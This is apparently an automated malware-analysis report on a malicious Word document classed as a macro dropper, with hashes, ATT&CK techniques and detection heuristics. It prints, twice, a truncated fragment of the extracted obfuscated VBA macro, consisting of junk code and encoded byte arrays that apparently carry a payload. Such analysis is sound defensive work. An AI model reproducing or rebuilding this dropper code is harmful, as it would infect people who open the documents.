Office (OLE) malware analysis — malicious · 1e40948501072e74

MALICIOUS

Office (OLE)

338.0 KB Created: 2015-12-16 14:32:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: bb465157264e424bd01f555d08f7ec66 SHA-1: 92ce3b77dcf5f582f1c88b8e26556958c45f4ebc SHA-256: 1e40948501072e741fd12db75e59a67d8e72f46e48ef41ebacb285acec681da8

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is a common pattern for malware droppers, where the macro downloads and executes a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6378595-0' further supports this assessment.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6378595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6378595-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45572 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45572 bytes
SHA-256: `074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long #Else Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long #End If Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant Sub LHJwPn() NrSyi8bt999vkR = 71 If Abs(6) = 57 Then OzAJDIA = 7498 Load QHW95ygCCXLKMlehi DateSerial 52, 90, 50 DeleteSetting "Qp4Y8D4vz89Olb" Randomize DyCTQ9UKs03HGVdP = EOF(96) If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80 DWcjwawOjsm = CVErr(31) Hour 53 AppActivate 41 HDM9913zDtS = 60 End Sub Function zKK(U6jMo As Integer) As Boolean PdKLCGN = 61 Static HFBwwFtzVi0lGw38q As Byte G7UUZ5FN3z = 78 HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1 OuWaqUF1z = 48 If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59) AeIBD = 73 zKK = HFBwwFtzVi0lGw38q = 0 Q9dlGz5OfQm = 70 HFBwwFtzVi0lGw38q = 0 QPM3j8cFUa0L = 81 End Function Sub OJwHPvvkNBx() WBJkej = 47 On Error Resume Next B0K8bUdQ = 54 A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237) VpGcg5LX = 51 A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11 ... (truncated)

SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.